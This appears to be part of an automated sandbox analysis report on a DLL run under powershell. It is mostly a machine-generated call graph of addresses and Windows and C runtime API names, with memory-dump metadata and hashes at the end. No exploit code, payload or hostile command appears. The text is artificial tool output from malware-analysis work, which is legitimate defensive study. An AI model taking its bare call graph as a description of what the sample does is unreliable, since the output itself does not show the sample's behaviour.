13213->13214 13215 7ffb08158758 _invalid_parameter_noinfo 31 API calls 13214->13215 13216 7ffb08158819 13215->13216 13216->12507 13218 7ffb08151aad __scrt_initialize_default_local_stdio_options 13217->13218 13221 7ffb081563e0 13218->13221 13222 7ffb0815641b 13221->13222 13223 7ffb08156406 13221->13223 13222->13223 13225 7ffb08156420 13222->13225 13224 7ffb08158b50 _get_daylight 15 API calls 13223->13224 13226 7ffb0815640b 13224->13226 13230 7ffb08153584 13225->13230 13228 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13226->13228 13229 7ffb08151ace 13228->13229 13229->12476 13237 7ffb0815a780 EnterCriticalSection 13230->13237 13232 7ffb081535a1 13233 7ffb08153b18 _vfwprintf_l 68 API calls 13232->13233 13234 7ffb081535aa 13233->13234 13235 7ffb0815a78c _vfwprintf_l LeaveCriticalSection 13234->13235 13236 7ffb081535b4 13235->13236 13236->13229 13239 7ffb08151480 13240 7ffb08151120 98 API calls 13239->13240 13241 7ffb08151493 13240->13241 13242 7ffb081514b1 13241->13242 13243 7ffb08151c00 fwprintf 70 API calls 13241->13243 13244 7ffb081514c3 13242->13244 13245 7ffb081567b0 62 API calls 13242->13245 13243->13242 13245->13244 13246 7ffb081516b0 13247 7ffb081516da 13246->13247 13260 7ffb08151590 13247->13260 13250 7ffb081516f8 13251 7ffb08151120 98 API calls 13250->13251 13254 7ffb081516fd 13251->13254 13252 7ffb0815176e VirtualFree 13253 7ffb08151732 13252->13253 13256 7ffb08151720 13254->13256 13258 7ffb08151c00 fwprintf 70 API calls 13254->13258 13255 7ffb08151739 13255->13252 13265 7ffb08151640 13255->13265 13256->13253 13259 7ffb081567b0 62 API calls 13256->13259 13258->13256 13259->13253 13261 7ffb081515c9 13260->13261 13262 7ffb08151630 13261->13262 13263 7ffb081515d4 VirtualAlloc 13261->13263 13262->13250 13262->13255 13264 7ffb081515fb 13263->13264 13264->13262 13272 7ffb08151150 13265->13272 13268 7ffb0815169e 13268->13252 13271 7ffb081567b0 62 API calls 13271->13268 13273 7ffb08151179 GetCurrentProcessId GetCurrentProcessId 13272->13273 13299 7ffb08151258 13272->13299 13304 7ffb08151ca0 13273->13304 13275 7ffb081512e8 13275->13268 13301 7ffb08151c50 13275->13301 13277 7ffb081568ec 98 API calls 13277->13275 13280 7ffb0815125a 13282 7ffb08151120 98 API calls 13280->13282 13281 7ffb081511ca 13283 7ffb081568ec 98 API calls 13281->13283 13285 7ffb0815125f 13282->13285 13284 7ffb081511e2 13283->13284 13286 7ffb08151205 13284->13286 13288 7ffb08151c50 fwprintf 73 API calls 13284->13288 13287 7ffb08151289 13285->13287 13289 7ffb08151c00 fwprintf 70 API calls 13285->13289 13290 7ffb08151217 13286->13290 13292 7ffb081567b0 62 API calls 13286->13292 13291 7ffb081512a7 13287->13291 13293 7ffb08151c50 fwprintf 73 API calls 13287->13293 13288->13286 13289->13287 13294 7ffb08151120 98 API calls 13290->13294 13296 7ffb081567b0 62 API calls 13291->13296 13291->13299 13292->13290 13293->13291 13295 7ffb0815121c 13294->13295 13297 7ffb08151246 13295->13297 13298 7ffb08151c00 fwprintf 70 API calls 13295->13298 13296->13299 13297->13299 13300 7ffb081567b0 62 API calls 13297->13300 13298->13297 13299->13275 13299->13277 13300->13299 13544 7ffb08151ae0 13301->13544 13317 7ffb08151bb0 13304->13317 13307 7ffb081568f8 13308 7ffb0815690c 13307->13308 13309 7ffb08156905 13307->13309 13311 7ffb0815b418 36 API calls 13308->13311 13524 7ffb0815b510 13309->13524 13312 7ffb0815691c 13311->13312 13313 7ffb08156920 13312->13313 13314 7ffb0815b510 33 API calls 13312->13314 13315 7ffb08157a10 __free_lconv_num 15 API calls 13313->13315 13314->13313 13316 7ffb081511c2 13315->13316 13316->13280 13316->13281 13320 7ffb08151b30 13317->13320 13321 7ffb08151b4d __scrt_initialize_default_local_stdio_options 13320->13321 13324 7ffb081564f8 13321->13324 13325 7ffb0815653e 13324->13325 13326 7ffb08156556 13324->13326 13328 7ffb08158b50 _get_daylight 15 API calls 13325->13328 13326->13325 13327 7ffb08156560 13326->13327 13329 7ffb08153a88 _fread_nolock 35 API calls 13327->13329 13330 7ffb08156543 13328->13330 13332 7ffb08156571 __scrt_fastfail 13329->13332 13331 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13330->13331 13350 7ffb0815654e 13331->13350 13351 7ffb0815398c 13332->13351 13333 7ffb08164990 _handle_error 8 API calls 13334 7ffb081511af 13333->13334 13334->13307 13339 7ffb081565ed 13341 7ffb08157a10 __free_lconv_num 15 API calls 13339->13341 13340 7ffb0815661c 13342 7ffb08156674 13340->13342 13343 7ffb0815662b 13340->13343 13344 7ffb08156698 13340->13344 13347 7ffb08156622 13340->13347 13341->13350 13348 7ffb08157a10 __free_lconv_num 15 API calls 13342->13348 13346 7ffb08157a10 __free_lconv_num 15 API calls 13343->13346 13344->13342 13345 7ffb081566a2 13344->13345 13349 7ffb08157a10 __free_lconv_num 15 API calls 13345->13349 13346->13350 13347->13342 13347->13343 13348->13350 13349->13350 13350->13333 13352 7ffb08158b50 _get_daylight 15 API calls 13351->13352 13353 7ffb081539fb 13352->13353 13354 7ffb0815407c 13353->13354 13355 7ffb081540b0 13354->13355 13356 7ffb08154098 13354->13356 13355->13356 13367 7ffb081540b7 13355->13367 13357 7ffb08158b50 _get_daylight 15 API calls 13356->13357 13359 7ffb0815409d 13357->13359 13358 7ffb081540a8 13358->13339 13358->13340 13360 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13359->13360 13360->13358 13361 7ffb0815426a 13362 7ffb08158b50 _get_daylight 15 API calls 13361->13362 13364 7ffb0815426f 13362->13364 13365 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13364->13365 13365->13358 13367->13358 13367->13361 13370 7ffb08154e20 13367->13370 13386 7ffb08154884 13367->13386 13408 7ffb08153d68 13367->13408 13411 7ffb08154568 13367->13411 13371 7ffb08154ea7 13370->13371 13381 7ffb08154e4a 13370->13381 13372 7ffb08154f2b 13371->13372 13373 7ffb08154eac 13371->13373 13434 7ffb08155468 13372->13434 13375 7ffb08154f11 13373->13375 13380 7ffb08154eb6 13373->13380 13422 7ffb08155bc4 13375->13422 13376 7ffb08154e88 13385 7ffb08154f34 _fread_nolock 13376->13385 13418 7ffb081558c8 13376->13418 13383 7ffb08154e98 _fread_nolock 13380->13383 13380->13385 13428 7ffb08155a24 13380->13428 13381->13372 13381->13376 13381->13380 13382 7ffb08154e7a 13381->13382 13381->13383 13381->13385 13382->13372 13382->13376 13382->13383 13383->13385 13442 7ffb08155f5c 13383->13442 13385->13367 13387 7ffb0815488f 13386->13387 13388 7ffb081548a8 13386->13388 13390 7ffb08154ea7 13387->13390 13391 7ffb081548cc 13387->13391 13403 7ffb08154e4a 13387->13403 13389 7ffb08158b50 _get_daylight 15 API calls 13388->13389 13388->13391 13392 7ffb081548c1 13389->13392 13393 7ffb08154f2b 13390->13393 13394 7ffb08154eac 13390->13394 13391->13367 13396 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13392->13396 13395 7ffb08155468 _fread_nolock 44 API calls 13393->13395 13397 7ffb08154f11 13394->13397 13401 7ffb08154eb6 13394->13401 13405 7ffb08154e98 _fread_nolock 13395->13405 13396->13391 13400 7ffb08155bc4 _fread_nolock 31 API calls 13397->13400 13398 7ffb08154e88 13399 7ffb081558c8 _fread_nolock 37 API calls 13398->13399 13407 7ffb08154f34 _fread_nolock 13398->13407 13399->13405 13400->13405 13402 7ffb08155a24 _fread_nolock 31 API calls 13401->13402 13401->13405 13401->13407 13402->13405 13403->13393 13403->13398 13403->13401 13404 7ffb08154e7a 13403->13404 13403->13405 13403->13407 13404->13393 13404->13398 13404->13405 13406 7ffb08155f5c _fread_nolock 37 API calls 13405->13406 13405->13407 13406->13407 13407->13367 13493 7ffb08158b84 13408->13493 13518 7ffb08154670 13411->13518 13414 7ffb08158b50 _get_daylight 15 API calls 13415 7ffb081545c9 13414->13415 13417 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13415->13417 13416 7ffb0815457c 13416->13367 13417->13416 13420 7ffb081558e4 _fread_nolock 13418->13420 13419 7ffb0815592d 13419->13383 13420->13419 13448 7ffb08158eb8 13420->13448 13427 7ffb08155bec _fread_nolock 13422->13427 13423 7ffb08158b50 _get_daylight 15 API calls 13424 7ffb08155bf5 13423->13424 13425 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13424->13425 13426 7ffb08155c00 13425->13426 13426->13383 13427->13423 13427->13426 13429 7ffb08155a45 13428->13429 13430 7ffb08158b50 _get_daylight 15 API calls 13429->13430 13433 7ffb08155a90 _fread_nolock 13429->13433 13431 7ffb08155a85 13430->13431 13432 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13431->13432 13432->13433 13433->13383 13435 7ffb08155480 13434->13435 13451 7ffb081535c4 13435->13451 13441 7ffb081555bb 13441->13383 13446 7ffb08155fe9 _fread_nolock 13442->13446 13447 7ffb08155f83 _fread_nolock 13442->13447 13443 7ffb08158eb8 _vfwprintf_l 37 API calls 13443->13447 13444 7ffb08164990 _handle_error 8 API calls 13445 7ffb08156021 13444->13445 13445->13385 13446->13444 13447->13443 13447->13446 13449 7ffb08158d34 _vfwprintf_l 37 API calls 13448->13449 13450 7ffb08158ec7 13449->13450 13450->13419 13452 7ffb081535f1 13451->13452 13454 7ffb08153600 13451->13454 13453 7ffb08158b50 _get_daylight 15 API calls 13452->13453 13455 7ffb081535f6 13453->13455 13454->13455 13456 7ffb08157a50 _vfwprintf_l 16 API calls 13454->13456 13461 7ffb0815a208 13455->13461 13457 7ffb0815362c 13456->13457 13458 7ffb08153640 13457->13458 13460 7ffb08157a10 __free_lconv_num 15 API calls 13457->13460 13459 7ffb08157a10 __free_lconv_num 15 API calls 13458->13459 13459->13455 13460->13458 13462 7ffb0815a24d 13461->13462 13463 7ffb0815a235 13461->13463 13462->13463 13467 7ffb0815a264 _fread_nolock 13462->13467 13464 7ffb08158b50 _get_daylight 15 API calls 13463->13464 13465 7ffb0815a23a 13464->13465 13466 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13465->13466 13484 7ffb0815559e 13466->13484 13471 7ffb0815a297 13467->13471 13473 7ffb0815a2b8 13467->13473 13468 7ffb0815a3f4 13470 7ffb08159838 _fread_nolock 36 API calls 13468->13470 13468->13484 13469 7ffb0815a3bb 13474 7ffb08159b98 _fread_nolock 36 API calls 13469->13474 13470->13484 13476 7ffb0815a0c4 _fread_nolock 36 API calls 13471->13476 13472 7ffb0815a331 13475 7ffb0815e3f0 _fread_nolock 32 API calls 13472->13475 13473->13468 13473->13469 13473->13472 13477 7ffb0815a2f5 13473->13477 13479 7ffb0815a2e7 13473->13479 13474->13484 13478 7ffb0815a35b 13475->13478 13476->13484 13480 7ffb08159f8c _fread_nolock 36 API calls 13477->13480 13481 7ffb0815de58 _fread_nolock 31 API calls 13478->13481 13479->13469 13482 7ffb0815a2f0 13479->13482 13480->13484 13483 7ffb0815a388 13481->13483 13482->13472 13482->13477 13483->13484 13485 7ffb08159e44 _fread_nolock 35 API calls 13483->13485 13484->13441 13486 7ffb08153cf8 13484->13486 13485->13484 13487 7ffb08158a6c _fread_nolock 43 API calls 13486->13487 13491 7ffb08153d10 13487->13491 13488 7ffb08153d24 13490 7ffb08158a6c _fread_nolock 43 API calls 13488->13490 13489 7ffb08158868 _fread_nolock 39 API calls 13489->13491 13492 7ffb08153d2c 13490->13492 13491->13488 13491->13489 13492->13441 13494 7ffb08158b9d _fread_nolock 13493->13494 13497 7ffb08157c0c 13494->13497 13498 7ffb08157c60 13497->13498 13499 7ffb08157c3a 13497->13499 13498->13499 13500 7ffb08157c6e 13498->13500 13501 7ffb08158b50 _get_daylight 15 API calls 13499->13501 13502 7ffb08153a88 _fread_nolock 35 API calls 13500->13502 13503 7ffb08157c3f 13501->13503 13506 7ffb08157c7a 13502->13506 13504 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13503->13504 13517 7ffb08153da9 13504->13517 13505 7ffb0815d508 _fread_nolock 39 API calls 13505->13506 13506->13505 13507 7ffb08157cd0 13506->13507 13508 7ffb08158b50 _get_daylight 15 API calls 13507->13508 13509 7ffb08157d4a 13507->13509 13510 7ffb08157d82 13508->13510 13511 7ffb08158b50 _get_daylight 15 API calls 13509->13511 13512 7ffb08157e3c _fread_nolock 13509->13512 13513 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13510->13513 13514 7ffb08157e31 13511->13514 13516 7ffb08158b50 _get_daylight 15 API calls 13512->13516 13512->13517 13513->13509 13515 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13514->13515 13515->13512 13516->13517 13517->13367 13519 7ffb08154578 13518->13519 13520 7ffb08154696 13518->13520 13519->13414 13519->13416 13520->13519 13521 7ffb08158b50 _get_daylight 15 API calls 13520->13521 13522 7ffb081546ef 13521->13522 13523 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13522->13523 13523->13519 13525 7ffb0815b52c 13524->13525 13526 7ffb0815b549 13524->13526 13528 7ffb08158b30 _vfwprintf_l 15 API calls 13525->13528 13526->13525 13527 7ffb0815b551 GetFileAttributesExW 13526->13527 13529 7ffb0815b562 GetLastError 13527->13529 13539 7ffb0815b578 13527->13539 13530 7ffb0815b531 13528->13530 13532 7ffb08158ae0 _vfwprintf_l 15 API calls 13529->13532 13531 7ffb08158b50 _get_daylight 15 API calls 13530->13531 13534 7ffb0815b539 13531->13534 13535 7ffb0815b56f 13532->13535 13533 7ffb0815b545 13537 7ffb08164990 _handle_error 8 API calls 13533->13537 13536 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13534->13536 13538 7ffb08158b50 _get_daylight 15 API calls 13535->13538 13536->13533 13540 7ffb0815b5b4 13537->13540 13538->13533 13539->13533 13541 7ffb08158b30 _vfwprintf_l 15 API calls 13539->13541 13540->13316 13542 7ffb0815b592 13541->13542 13543 7ffb08158b50 _get_daylight 15 API calls 13542->13543 13543->13535 13545 7ffb08151afd __scrt_initialize_default_local_stdio_options 13544->13545 13548 7ffb0815646c 13545->13548 13549 7ffb08156492 13548->13549 13550 7ffb081564a7 13548->13550 13552 7ffb08158b50 _get_daylight 15 API calls 13549->13552 13550->13549 13551 7ffb081564ac 13550->13551 13557 7ffb08153544 13551->13557 13554 7ffb08156497 13552->13554 13555 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13554->13555 13556 7ffb08151694 13555->13556 13556->13271 13564 7ffb0815a780 EnterCriticalSection 13557->13564 13559 7ffb08153561 13560 7ffb08153c08 _vfwprintf_l 71 API calls 13559->13560 13561 7ffb0815356a 13560->13561 13562 7ffb0815a78c _vfwprintf_l LeaveCriticalSection 13561->13562 13563 7ffb08153574 13562->13563 13563->13556 13565 7ffb08151ef0 13566 7ffb08151f16 13565->13566 13567 7ffb08151f2d dllmain_raw 13566->13567 13571 7ffb08151f1e 13566->13571 13573 7ffb08151f4d 13566->13573 13568 7ffb08151f40 13567->13568 13567->13571 13582 7ffb08151cf0 13568->13582 13573->13571 13614 7ffb081519b0 13573->13614 13574 7ffb08151f9a 13574->13571 13575 7ffb08151cf0 62 API calls 13574->13575 13577 7ffb08151fb0 13575->13577 13576 7ffb081519b0 102 API calls 13578 7ffb08151f80 13576->13578 13577->13571 13580 7ffb08151fba dllmain_raw 13577->13580 13579 7ffb08151cf0 62 API calls 13578->13579 13581 7ffb08151f8d dllmain_raw 13579->13581 13580->13571 13581->13574 13583 7ffb08151cf8 13582->13583 13592 7ffb08151d31 __scrt_acquire_startup_lock 13582->13592 13584 7ffb08151cfd 13583->13584 13585 7ffb08151d25 13583->13585 13586 7ffb08151d02 13584->13586 13587 7ffb08151d18 __scrt_dllmain_crt_thread_attach 13584->13587 13629 7ffb081521ec 13585->13629 13590 7ffb08151d07 13586->13590 13637 7ffb0815212c 13586->13637 13591 7ffb08151d16 13587->13591 13588 7ffb08151e8a 13588->13573 13590->13573 13591->13573 13592->13588 13594 7ffb08151eb5 13592->13594 13595 7ffb08152554 __scrt_fastfail 7 API calls 13592->13595 13656 7ffb081521a8 13594->13656 13595->13594 13597 7ffb08151eba 13661 7ffb081521d8 13597->13661 13598 7ffb08151d62 __scrt_acquire_startup_lock 13600 7ffb08151d8e 13598->13600 13610 7ffb08151d66 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 13598->13610 13642 7ffb08152554 IsProcessorFeaturePresent 13598->13642 13649 7ffb081520ec 13600->13649 13601 7ffb08151ec5 __scrt_release_startup_lock 13666 7ffb081523c4 13601->13666 13605 7ffb08151d9d _RTC_Initialize 13605->13610 13652 7ffb08152440 13605->13652 13610->13573 13615 7ffb081519d1 13614->13615 13616 7ffb081519d3 13614->13616 13618 7ffb08151120 98 API calls 13615->13618 13617 7ffb08151120 98 API calls 13616->13617 13619 7ffb081519d8 13617->13619 13620 7ffb08151a3e 13618->13620 13621 7ffb081519f6 13619->13621 13622 7ffb08151c00 fwprintf 70 API calls 13619->13622 13624 7ffb08151a5c 13620->13624 13627 7ffb08151c00 fwprintf 70 API calls 13620->13627 13623 7ffb08151a08 DisableThreadLibraryCalls 13621->13623 13625 7ffb081567b0 62 API calls 13621->13625 13622->13621 13626 7ffb08151a6e 13623->13626 13624->13626 13628 7ffb081567b0 62 API calls 13624->13628 13625->13623 13626->13574 13626->13576 13627->13624 13628->13626 13630 7ffb0815220e __isa_available_init 13629->13630 13670 7ffb08152c04 13630->13670 13633 7ffb08152217 13633->13598 13757 7ffb081579b4 13637->13757 13643 7ffb08152579 __scrt_fastfail 13642->13643 13644 7ffb08152595 RtlCaptureContext RtlLookupFunctionEntry 13643->13644 13645 7ffb081525be RtlVirtualUnwind 13644->13645 13646 7ffb081525fa __scrt_fastfail 13644->13646 13645->13646 13647 7ffb0815262c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13646->13647 13648 7ffb0815267e 13647->13648 13648->13600 13828 7ffb08152238 13649->13828 13651 7ffb081520f7 13651->13605 13833 7ffb081523f0 13652->13833 13654 7ffb08151db2 13655 7ffb08152504 InitializeSListHead 13654->13655 13657 7ffb081521b1 __scrt_initialize_onexit_tables 13656->13657 13659 7ffb081521c5 13657->13659 13848 7ffb08157404 13657->13848 13659->13597 13856 7ffb081579d8 13661->13856 13664 7ffb0815304c __vcrt_uninitialize_ptd 6 API calls 13665 7ffb08152c89 13664->13665 13665->13601 13667 7ffb081523d5 __scrt_uninitialize_crt 13666->13667 13668 7ffb081523e7 13667->13668 13669 7ffb08152c60 __vcrt_uninitialize 8 API calls 13667->13669 13668->13588 13669->13668 13671 7ffb08152c0d __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 13670->13671 13690 7ffb08153070 13671->13690 13674 7ffb08152213 13674->13633 13678 7ffb0815798c 13674->13678 13679 7ffb0815cf5c 13678->13679 13680 7ffb08152220 13679->13680 13741 7ffb0815ab10 13679->13741 13680->13633 13682 7ffb08152c60 13680->13682 13683 7ffb08152c68 13682->13683 13684 7ffb08152c79 13682->13684 13685 7ffb0815304c __vcrt_uninitialize_ptd 6 API calls 13683->13685 13684->13633 13686 7ffb08152c6d 13685->13686 13687 7ffb081530b8 __vcrt_uninitialize_locks DeleteCriticalSection 13686->13687 13688 7ffb08152c72 13687->13688 13753 7ffb081534e0 13688->13753 13692 7ffb08153078 13690->13692 13693 7ffb081530a9 13692->13693 13694 7ffb08152c17 13692->13694 13707 7ffb0815341c 13692->13707 13695 7ffb081530b8 __vcrt_uninitialize_locks DeleteCriticalSection 13693->13695 13694->13674 13696 7ffb0815300c 13694->13696 13695->13694 13722 7ffb081532b8 13696->13722 13698 7ffb0815301c 13699 7ffb08152c24 13698->13699 13727 7ffb081533b4 13698->13727 13699->13674 13703 7ffb081530b8 13699->13703 13701 7ffb08153039 13701->13699 13732 7ffb0815304c 13701->13732 13704 7ffb081530e3 13703->13704 13705 7ffb081530e7 13704->13705 13706 7ffb081530c6 DeleteCriticalSection 13704->13706 13705->13674 13706->13704 13712 7ffb081530f0 13707->13712 13710 7ffb08153473 InitializeCriticalSectionAndSpinCount 13711 7ffb0815345f 13710->13711 13711->13692 13713 7ffb08153156 13712->13713 13714 7ffb08153151 13712->13714 13713->13710 13713->13711 13714->13713 13715 7ffb08153189 LoadLibraryExW 13714->13715 13718 7ffb0815321e 13714->13718 13721 7ffb081531fc FreeLibrary 13714->13721 13715->13714 13717 7ffb081531af GetLastError 13715->13717 13716 7ffb0815322d GetProcAddress 13716->13713 13719 7ffb08153245 13716->13719 13717->13714 13720 7ffb081531ba LoadLibraryExW 13717->13720 13718->13713 13718->13716 13719->13713 13720->13714 13721->13714 13723 7ffb081530f0 try_get_function 5 API calls 13722->13723 13724 7ffb081532e4 13723->13724 13725 7ffb081532fb TlsAlloc 13724->13725 13726 7ffb081532ec 13724->13726 13725->13726 13726->13698 13728 7ffb081530f0 try_get_function 5 API calls 13727->13728 13729 7ffb081533e7 13728->13729 13730 7ffb08153400 TlsSetValue 13729->13730 13731 7ffb081533ef 13729->13731 13730->13731 13731->13701 13733 7ffb0815305b 13732->13733 13734 7ffb08153060 13732->13734 13736 7ffb0815330c 13733->13736 13734->13699 13737 7ffb081530f0 try_get_function 5 API calls 13736->13737 13738 7ffb08153337 13737->13738 13739 7ffb0815334d TlsFree 13738->13739 13740 7ffb0815333f 13738->13740 13739->13740 13740->13734 13752 7ffb0815b604 EnterCriticalSection 13741->13752 13743 7ffb0815ab20 13744 7ffb08160250 32 API calls 13743->13744 13745 7ffb0815ab29 13744->13745 13746 7ffb0815ab37 13745->13746 13747 7ffb0815a928 34 API calls 13745->13747 13748 7ffb0815b658 abort LeaveCriticalSection 13746->13748 13749 7ffb0815ab32 13747->13749 13750 7ffb0815ab43 13748->13750 13751 7ffb0815aa14 GetStdHandle GetFileType 13749->13751 13750->13679 13751->13746 13754 7ffb081534e4 13753->13754 13756 7ffb08153518 13753->13756 13755 7ffb081534fe FreeLibrary 13754->13755 13754->13756 13755->13754 13756->13684 13763 7ffb08159590 13757->13763 13760 7ffb08152c4c 13815 7ffb08152f04 13760->13815 13764 7ffb081595a1 13763->13764 13765 7ffb08152135 13763->13765 13766 7ffb0815b910 abort 6 API calls 13764->13766 13765->13760 13767 7ffb081595a6 13766->13767 13767->13765 13768 7ffb0815b968 abort 6 API calls 13767->13768 13769 7ffb081595bb 13768->13769 13773 7ffb08159430 13769->13773 13774 7ffb08159472 13773->13774 13775 7ffb0815947a 13773->13775 13776 7ffb08157a10 __free_lconv_num 15 API calls 13774->13776 13777 7ffb08157a10 __free_lconv_num 15 API calls 13775->13777 13776->13775 13778 7ffb08159487 13777->13778 13779 7ffb08157a10 __free_lconv_num 15 API calls 13778->13779 13780 7ffb08159494 13779->13780 13781 7ffb08157a10 __free_lconv_num 15 API calls 13780->13781 13782 7ffb081594a1 13781->13782 13783 7ffb08157a10 __free_lconv_num 15 API calls 13782->13783 13784 7ffb081594ae 13783->13784 13785 7ffb08157a10 __free_lconv_num 15 API calls 13784->13785 13786 7ffb081594bb 13785->13786 13787 7ffb08157a10 __free_lconv_num 15 API calls 13786->13787 13788 7ffb081594c8 13787->13788 13789 7ffb08157a10 __free_lconv_num 15 API calls 13788->13789 13790 7ffb081594d5 13789->13790 13791 7ffb08157a10 __free_lconv_num 15 API calls 13790->13791 13792 7ffb081594e5 13791->13792 13793 7ffb08157a10 __free_lconv_num 15 API calls 13792->13793 13794 7ffb081594f5 13793->13794 13799 7ffb08159218 13794->13799 13813 7ffb0815b604 EnterCriticalSection 13799->13813 13816 7ffb0815213a 13815->13816 13817 7ffb08152f18 13815->13817 13816->13591 13818 7ffb08152f22 13817->13818 13823 7ffb08153360 13817->13823 13819 7ffb081533b4 __vcrt_FlsSetValue 6 API calls 13818->13819 13821 7ffb08152f32 13819->13821 13821->13816 13822 7ffb08157a10 __free_lconv_num 15 API calls 13821->13822 13822->13816 13824 7ffb081530f0 try_get_function 5 API calls 13823->13824 13825 7ffb0815338b 13824->13825 13826 7ffb081533a1 TlsGetValue 13825->13826 13827 7ffb08153393 13825->13827 13826->13827 13827->13818 13829 7ffb081522f6 13828->13829 13832 7ffb08152250 __scrt_initialize_onexit_tables 13828->13832 13830 7ffb08152554 __scrt_fastfail 7 API calls 13829->13830 13831 7ffb08152300 13830->13831 13832->13651 13834 7ffb0815241f 13833->13834 13836 7ffb08152415 _onexit 13833->13836 13837 7ffb0815780c 13834->13837 13836->13654 13840 7ffb081573c8 13837->13840 13847 7ffb0815b604 EnterCriticalSection 13840->13847 13855 7ffb0815b604 EnterCriticalSection 13848->13855 13859 7ffb08159744 13856->13859 13860 7ffb081521e3 13859->13860 13861 7ffb08159753 13859->13861 13860->13664 13863 7ffb0815b8b8 13861->13863 13864 7ffb0815b674 __vcrt_uninitialize_ptd 5 API calls 13863->13864 13865 7ffb0815b8e3 13864->13865 13866 7ffb0815b8fa TlsFree 13865->13866 13867 7ffb0815b8eb 13865->13867 13866->13867 13867->13860 13868 7ffb08151870 13869 7ffb08151120 98 API calls 13868->13869 13870 7ffb0815188d 13869->13870 13871 7ffb08151c00 fwprintf 70 API calls 13870->13871 13873 7ffb081518ab 13870->13873 13871->13873 13872 7ffb081518bd 13874 7ffb081518d1 13872->13874 13875 7ffb081518de GlobalAlloc 13872->13875 13873->13872 13876 7ffb081567b0 62 API calls 13873->13876 13875->13874 13877 7ffb08151902 13875->13877 13876->13872 13881 7ffb08151300 13877->13881 13882 7ffb08151120 98 API calls 13881->13882 13883 7ffb08151318 13882->13883 13884 7ffb08151336 13883->13884 13886 7ffb08151c00 fwprintf 70 API calls 13883->13886 13885 7ffb08151348 13884->13885 13887 7ffb081567b0 62 API calls 13884->13887 13899 7ffb08151380 13885->13899 13886->13884 13887->13885 13890 7ffb081513f0 13891 7ffb08151120 98 API calls 13890->13891 13892 7ffb081513fe 13891->13892 13893 7ffb0815141c 13892->13893 13894 7ffb08151c00 fwprintf 70 API calls 13892->13894 13895 7ffb0815142e 13893->13895 13896 7ffb081567b0 62 API calls 13893->13896 13894->13893 13897 7ffb0815144f GlobalFree 13895->13897 13898 7ffb08151468 13895->13898 13896->13895 13897->13898 13898->13874 13900 7ffb08151120 98 API calls 13899->13900 13901 7ffb0815138e 13900->13901 13902 7ffb081513ac 13901->13902 13903 7ffb08151c00 fwprintf 70 API calls 13901->13903 13904 7ffb08151365 13902->13904 13905 7ffb081567b0 62 API calls 13902->13905 13903->13902 13904->13890 13905->13904 13906 7ffb08162d4c 13907 7ffb08162d75 13906->13907 13909 7ffb08162d8d 13906->13909 13908 7ffb08158b30 _vfwprintf_l 15 API calls 13907->13908 13912 7ffb08162d7a 13908->13912 13910 7ffb08162e08 13909->13910 13913 7ffb08162dc0 13909->13913 13911 7ffb08158b30 _vfwprintf_l 15 API calls 13910->13911 13914 7ffb08162e0d 13911->13914 13915 7ffb08158b50 _get_daylight 15 API calls 13912->13915 13930 7ffb08160308 EnterCriticalSection 13913->13930 13917 7ffb08158b50 _get_daylight 15 API calls 13914->13917 13929 7ffb08162d82 13915->13929 13919 7ffb08162e15 13917->13919 13918 7ffb08162dc7 13920 7ffb08162dec 13918->13920 13921 7ffb08162dd7 13918->13921 13922 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13919->13922 13924 7ffb08162e3c 33 API calls 13920->13924 13923 7ffb08158b50 _get_daylight 15 API calls 13921->13923 13922->13929 13925 7ffb08162ddc 13923->13925 13926 7ffb08162de7 13924->13926 13927 7ffb08158b30 _vfwprintf_l 15 API calls 13925->13927 13928 7ffb081603ec _vfwprintf_l LeaveCriticalSection 13926->13928 13927->13926 13928->13929

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFB0815509C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: e21140e0bf43f4d7244232922c54583ec63da3c1c6658ac7ebc3abe6e77e062f
                                                                                                                                                                                                                                                        • Instruction ID: 0fc331ccf894d1690a272b13563edddda3597cdcf5694cc9081836bd1624451a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e21140e0bf43f4d7244232922c54583ec63da3c1c6658ac7ebc3abe6e77e062f
